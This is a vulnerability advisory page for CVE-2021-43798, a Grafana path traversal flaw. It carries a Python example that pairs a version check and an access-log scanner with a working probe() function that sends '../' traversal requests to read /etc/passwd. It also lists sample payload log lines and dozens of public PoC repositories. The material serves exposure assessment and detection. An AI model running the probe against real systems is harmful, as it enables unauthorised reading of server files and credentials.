CVE-2021-43798

Grafana path traversal

CVSS 7.5 HIGH · EPSS 88.8% · ● KEV · CWE-22
Summary

Grafana versions 8.0.0-beta1 through 8.3.0 have a flaw that lets an attacker read files from the server by manipulating the plugin URL path. This bypasses the normal access controls and can expose sensitive data such as configuration files or credentials.

Technical detail

A path traversal vulnerability in Grafana's public plugin endpoint lets unauthenticated attackers read arbitrary files by appending directory traversal sequences after the plugin ID in the URL path. It affects versions 8.0.0-beta1 through 8.3.0 (excluding the patched releases) and requires only network access to the vulnerable endpoint. The read is performed by the Grafana process itself, so what can be exposed is whatever that account can read; in practice this includes the Grafana configuration file and, through it, credentials that several of the public PoCs below decrypt.

Summary generated and translated by AI from the official description.
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins/<plugin-id>/`, where `<plugin-id>` is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
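The following is an added example written for this page; it is not code from the page, from Grafana, or from any of the PoC repositories listed below. It puts the advisory's facts to work in three small pieces: a version check against the affected and fixed releases named above, a builder for the traversal request path (sent with `http.client` because it does not normalise `..` before transmitting), and a scanner that flags traversal attempts against `/public/plugins/<plugin-id>/` in reverse-proxy access logs. Assumptions, marked in the code: `alertlist` as a plugin ID present by default, eight `..` segments as enough to reach the filesystem root, nginx/Apache combined log format, and constructed sample log lines.

```python
# Added example for this page: not code from the page, from Grafana, or from any
# listed PoC. Assumptions are marked in comments.
import http.client
import re
from urllib.parse import unquote

# Fixed releases named in the advisory: 8.0.7, 8.1.8, 8.2.7, 8.3.1.
# Maps an 8.x minor version to the first patch level that is no longer affected.
FIRST_FIXED_PATCH = {0: 7, 1: 8, 2: 7, 3: 1}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.]+)?$")


def is_affected(version: str) -> bool:
    """True if a Grafana version is in the advisory's range 8.0.0-beta1 .. 8.3.0,
    minus the fixed releases."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major != 8 or minor not in FIRST_FIXED_PATCH:
        return False
    # A pre-release such as 8.0.0-beta1 is judged by its numeric part; every 8.x
    # pre-release at or below 8.3.0 is affected, so that is safe here.
    return patch < FIRST_FIXED_PATCH[minor]


def traversal_path(plugin_id: str, target_file: str, depth: int = 8) -> str:
    """Request path that steps out of /public/plugins/<plugin_id>/ to target_file.

    depth=8 is assumed to be enough to reach '/' from a default install (extra
    '..' segments are harmless). The '..' segments must reach the server intact,
    so do not send this through a client that normalises paths before sending.
    """
    return "/public/plugins/%s/%s%s" % (plugin_id, "../" * depth, target_file.lstrip("/"))


def probe(host: str, port: int = 3000, plugin_id: str = "alertlist",
          target_file: str = "/etc/passwd", use_tls: bool = False,
          timeout: float = 5.0) -> tuple:
    """Send one probe to a Grafana instance you are authorised to test.

    http.client transmits the request-target verbatim, so '..' survives.
    'alertlist' is assumed to be present by default; any installed plugin ID
    works. Returns (HTTP status, response body).
    """
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("GET", traversal_path(plugin_id, target_file))
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


# Combined log format as written by nginx/Apache in front of Grafana (assumption:
# Grafana's own router log lines differ and need their own regex).
_REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def is_plugin_traversal(raw_path: str) -> bool:
    """True if a request path abuses /public/plugins/<id>/ with '..' segments,
    including %2e%2e, ..%2f and double-encoded variants."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):                      # peel up to three encoding layers
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if not path.startswith("/public/plugins/"):
        return False
    return ".." in path.split("/")


def scan_access_log(lines):
    """One record per request that looks like a CVE-2021-43798 attempt.
    likely_success is True when the server answered 200, i.e. served a file."""
    hits = []
    for line in lines:
        m = _REQ_RE.match(line)
        if not m:
            continue
        src, path, status = m.group(1), m.group(2), int(m.group(3))
        if is_plugin_traversal(path):
            hits.append({"src": src, "path": path, "status": status,
                         "likely_success": status == 200})
    return hits


# Constructed sample log lines (not real traffic) to exercise the scanner.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Dec/2021:10:15:01 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1810',
    '10.0.0.6 - - [08/Dec/2021:10:15:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 43012',
    '10.0.0.7 - - [08/Dec/2021:10:15:03 +0000] "GET /public/plugins/grafana-clock-panel/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 404 19',
    '10.0.0.8 - - [08/Dec/2021:10:15:04 +0000] "GET /api/health HTTP/1.1" 200 45',
]

if __name__ == "__main__":
    for v in ("8.0.0-beta1", "8.3.0", "8.3.1", "8.4.0"):
        print(v, "affected" if is_affected(v) else "not affected")
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The log scanner decodes before matching, so it catches the encoded forms some of the PoCs use; it only tells you that a traversal was attempted, and the status code is the cheapest signal of whether the server served the file. Run `probe()` only against hosts you are authorised to test, and note that a 200 on `/etc/passwd` is the confirmation, not the goal: the same read reaches the Grafana configuration and database, which is why the affected instance should be patched rather than merely firewalled.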
Affected products
grafana · grafana
Public PoCs found: 53
github · github.com/jas502n/Grafana-CVE-2021-43798 · 368
github · github.com/A-D-Team/grafanaExp · 268
github · github.com/pedrohavay/exploit-grafana-CVE-2021-43798 · 46
github · github.com/taythebot/CVE-2021-43798 · 41
github · github.com/zer0yu/CVE-2021-43798 · 27
github · github.com/Mr-xn/CVE-2021-43798 · 24
github · github.com/MoCh3n/CVE-2021-43798-grafana_fileread · 17
github · github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC · 14
github · github.com/asaotomo/CVE-2021-43798-Grafana-Exp · 12
github · github.com/Mo0ns/Grafana_POC-CVE-2021-43798 · 9
github · github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798 · 8
github · github.com/kenuosec/grafanaExp · 6
github · github.com/z3n70/CVE-2021-43798 · 5
github · github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT · 4
github · github.com/s1gh/CVE-2021-43798 · 4
github · github.com/hupe1980/CVE-2021-43798 · 3
github · github.com/0xSAZZAD/Grafana-CVE-2021-43798 · 3
github · github.com/wezoomagency/GrafXploit · 3
github · github.com/Ryze-T/CVE-2021-43798 · 2
github · github.com/fanygit/Grafana-CVE-2021-43798Exp · 2
github · github.com/monke443/CVE-2021-43798 · 2
github · github.com/lfz97/CVE-2021-43798-Grafana-File-Read · 1
github · github.com/LongWayHomie/CVE-2021-43798 · 1
github · github.com/k3rwin/CVE-2021-43798-Grafana · 1
github · github.com/Jroo1053/GrafanaDirInclusion · 1
github · github.com/FAOG99/GrafanaDirectoryScanner · 1
github · github.com/wagneralves/CVE-2021-43798 · 1
github · github.com/Strikoder-Premium/Grafana-Password-Decryptor · 1
github · github.com/Asbawy/GrafTraverse-CVE-2021-43798 · 0
github · github.com/katseyres2/CVE-2021-43798 · 0
github · github.com/Iris288/CVE-2021-43798 · 0
github · github.com/Okymi-X/CVE-2021-43798 · 0
github · github.com/halencarjunior/grafana-CVE-2021-43798 · 0
github · github.com/ticofookfook/CVE-2021-43798 · 0
github · github.com/MalekAlthubiany/CVE-2021-43798 · 0
github · github.com/gixxyboy/CVE-2021-43798 · 0
github · github.com/hxlxmj/Grafxploit · 0
github · github.com/G01d3nW01f/CVE-2021-43798 · 0
github · github.com/mauricelambert/LabAutomationCVE-2021-43798 · 0
github · github.com/victorhorowitz/grafana-exploit-CVE-2021-43798 · 0
github · github.com/JiuBanSec/Grafana-CVE-2021-43798 · 0
github · github.com/davidrxchester/Grafana-8.3-Directory-Traversal · 0
github · github.com/ravi5hanka/CVE-2021-43798-Exploit-for-Windows-and-Linux · 0
github · github.com/suljov/Grafana-LFI-exploit · 0
github · github.com/abuyazeen/CVE-2021-43798-Grafana-path-traversal-tester · 0
github · github.com/0xf3d0rq/CVE-2021-43798 · 0
github · github.com/baktistr/cve-2021-43798-enum · 0
github · github.com/notbside/CVE-2021-43798-PoC · 0
github · github.com/Shoxake17/CVE-2021-43798 · 0
github · github.com/kikechans/-Grafana-LFI-CVE-2021-43798 · 0
cve_reference · packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html · unverified
exploitdb · www.exploit-db.com/exploits/50581 · unverified
cve_reference · packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.html · unverified
⚠ Public resources, for assessing the exposure of systems you control or are authorised to test. Test only with authorisation.

Want to know whether your infrastructure is exposed to this?

Talk to TrueHacking →